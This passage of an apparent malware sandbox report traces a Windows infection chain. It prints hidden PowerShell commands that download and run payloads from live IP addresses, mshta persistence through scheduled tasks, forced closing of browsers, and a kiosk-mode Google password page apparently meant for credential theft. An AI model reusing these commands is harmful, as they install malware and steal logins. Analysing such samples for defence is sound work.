4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 eba65d1d30.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a eba65d1d30.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2540 schtasks.exe 836 schtasks.exe 2780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
pid Process 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 2020 rapes.exe 2524 powershell.exe 2524 powershell.exe 2524 powershell.exe 1300 TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE 2896 powershell.exe 2868 powershell.exe 2648 powershell.exe 2684 powershell.exe 2736 7ece595e42.exe 2684 powershell.exe 2684 powershell.exe 548 483d2fa8a0d53818306efeb32d3.exe 1740 eba65d1d30.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1576 powershell.exe 1740 eba65d1d30.exe 1740 eba65d1d30.exe 1740 eba65d1d30.exe 1740 eba65d1d30.exe 2624 f831ef21a9.exe 1064 eeea2c0482.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1780 e45f20b736.exe 1780 e45f20b736.exe 1780 e45f20b736.exe 3324 v6Oqdnc.exe 3848 ce4pMzk.exe 3848 ce4pMzk.exe 3848 ce4pMzk.exe 3848 ce4pMzk.exe 3736 FvbuInU.exe 3736 FvbuInU.exe 3736 FvbuInU.exe 3736 FvbuInU.exe 3736 FvbuInU.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 2524 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2328 d20f842ca5.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 1504 taskkill.exe Token: SeDebugPrivilege 3044 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1936 taskkill.exe Token: SeDebugPrivilege 636 firefox.exe Token: SeDebugPrivilege 636 firefox.exe Token: SeDebugPrivilege 1780 e45f20b736.exe Token: SeDebugPrivilege 3848 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 1864 51f7b9b684.exe 1864 51f7b9b684.exe 1864 51f7b9b684.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 636 firefox.exe 636 firefox.exe 636 firefox.exe 636 firefox.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 1864 51f7b9b684.exe 1864 51f7b9b684.exe 1864 51f7b9b684.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 636 firefox.exe 636 firefox.exe 636 firefox.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe 1032 7093c1f919.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2076 wrote to memory of 2244 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 30 PID 2076 wrote to memory of 2244 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 30 PID 2076 wrote to memory of 2244 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 30 PID 2076 wrote to memory of 2244 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 30 PID 2076 wrote to memory of 2892 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 31 PID 2076 wrote to memory of 2892 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 31 PID 2076 wrote to memory of 2892 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 31 PID 2076 wrote to memory of 2892 2076 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe 31 PID 2244 wrote to memory of 2540 2244 cmd.exe 33 PID 2244 wrote to memory of 2540 2244 cmd.exe 33 PID 2244 wrote to memory of 2540 2244 cmd.exe 33 PID 2244 wrote to memory of 2540 2244 cmd.exe 33 PID 2892 wrote to memory of 2332 2892 mshta.exe 34 PID 2892 wrote to memory of 2332 2892 mshta.exe 34 PID 2892 wrote to memory of 2332 2892 mshta.exe 34 PID 2892 wrote to memory of 2332 2892 mshta.exe 34 PID 2332 wrote to memory of 2728 2332 powershell.exe 37 PID 2332 wrote to memory of 2728 2332 powershell.exe 37 PID 2332 wrote to memory of 2728 2332 powershell.exe 37 PID 2332 wrote to memory of 2728 2332 powershell.exe 37 PID 2728 wrote to memory of 2020 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 38 PID 2728 wrote to memory of 2020 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 38 PID 2728 wrote to memory of 2020 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 38 PID 2728 wrote to memory of 2020 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 38 PID 2020 wrote to memory of 3016 2020 rapes.exe 40 PID 2020 wrote to memory of 3016 2020 rapes.exe 40 PID 2020 wrote to memory of 3016 2020 rapes.exe 40 PID 2020 wrote to memory of 3016 2020 rapes.exe 40 PID 2020 wrote to memory of 1864 2020 rapes.exe 41 PID 2020 wrote to memory of 1864 2020 rapes.exe 41 PID 2020 wrote to memory of 1864 2020 rapes.exe 41 PID 2020 wrote to memory of 1864 2020 rapes.exe 41 PID 1864 wrote to memory of 628 1864 51f7b9b684.exe 42 PID 1864 wrote to memory of 628 1864 51f7b9b684.exe 42 PID 1864 wrote to memory of 628 1864 51f7b9b684.exe 42 PID 1864 wrote to memory of 628 1864 51f7b9b684.exe 42 PID 1864 wrote to memory of 2192 1864 51f7b9b684.exe 43 PID 1864 wrote to memory of 2192 1864 51f7b9b684.exe 43 PID 1864 wrote to memory of 2192 1864 51f7b9b684.exe 43 PID 1864 wrote to memory of 2192 1864 51f7b9b684.exe 43 PID 628 wrote to memory of 836 628 cmd.exe 45 PID 628 wrote to memory of 836 628 cmd.exe 45 PID 628 wrote to memory of 836 628 cmd.exe 45 PID 628 wrote to memory of 836 628 cmd.exe 45 PID 2192 wrote to memory of 2524 2192 mshta.exe 46 PID 2192 wrote to memory of 2524 2192 mshta.exe 46 PID 2192 wrote to memory of 2524 2192 mshta.exe 46 PID 2192 wrote to memory of 2524 2192 mshta.exe 46 PID 2524 wrote to memory of 1300 2524 powershell.exe 48 PID 2524 wrote to memory of 1300 2524 powershell.exe 48 PID 2524 wrote to memory of 1300 2524 powershell.exe 48 PID 2524 wrote to memory of 1300 2524 powershell.exe 48 PID 2020 wrote to memory of 1508 2020 rapes.exe 49 PID 2020 wrote to memory of 1508 2020 rapes.exe 49 PID 2020 wrote to memory of 1508 2020 rapes.exe 49 PID 2020 wrote to memory of 1508 2020 rapes.exe 49 PID 1508 wrote to memory of 2056 1508 cmd.exe 51 PID 1508 wrote to memory of 2056 1508 cmd.exe 51 PID 1508 wrote to memory of 2056 1508 cmd.exe 51 PID 1508 wrote to memory of 2056 1508 cmd.exe 51 PID 3016 wrote to memory of 2540 3016 zY9sqWs.exe 53 PID 3016 wrote to memory of 2540 3016 zY9sqWs.exe 53 PID 3016 wrote to memory of 2540 3016 zY9sqWs.exe 53 PID 3016 wrote to memory of 2540 3016 zY9sqWs.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE"C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 10407⤵
- Loads dropped DLL
- Program crash
PID:2540
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe"C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE"C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "QB8c5maXb3p" /tr "mshta \"C:\Temp\jVnN29abX.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2780
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\jVnN29abX.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:548
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe"C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2736 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2244
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 10208⤵
- Loads dropped DLL
- Program crash
PID:340
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:2596
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe"C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:2956 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2548
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe"C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"6⤵
- Executes dropped EXE
PID:1004 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC6C.tmp\BC6D.tmp\BC6E.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"7⤵PID:836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe"C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe"C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1064
-
-
C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe"C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1032 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:636 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.0.1060569481\647303324" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1200 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aed649f7-cf73-4852-b31f-71412d67fa40} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1284 46ef558 gpu9⤵PID:2432
-
-
